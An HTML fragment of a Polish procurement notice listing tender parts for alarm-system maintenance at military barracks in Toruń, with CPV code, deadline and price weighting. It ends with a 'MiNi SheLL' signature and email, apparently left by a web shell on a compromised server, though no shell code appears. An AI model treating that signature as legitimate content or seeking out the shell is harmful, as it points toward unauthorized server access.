<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacje i naprawy awaryjne systemów alarmowych świadczone dla Regionu Wsparcia Teleinformatycznego (RWT) w Bydgoszczy znajdujących się w kompleksie koszarowym: 2016 w Toruniu oraz kompleksie koszarowym: 8617 w Chorągiewce, 12 km od Torunia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.32.41.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. cena za 1rbh napraw awaryjnych - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Konserwacje i naprawy awaryjne systemów alarmowych świadczone dla Oddziału Żandarmerii Wojskowej w Bydgoszczy znajdujących się w kompleksie koszarowym: 2016/2 w Toruniu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacje i naprawy awaryjne systemów alarmowych świadczone dla Oddziału Żandarmerii Wojskowej w Bydgoszczy znajdujących się w kompleksie koszarowym: 2016/2 w Toruniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.32.41.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za 1rbh napraw awaryjnych - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com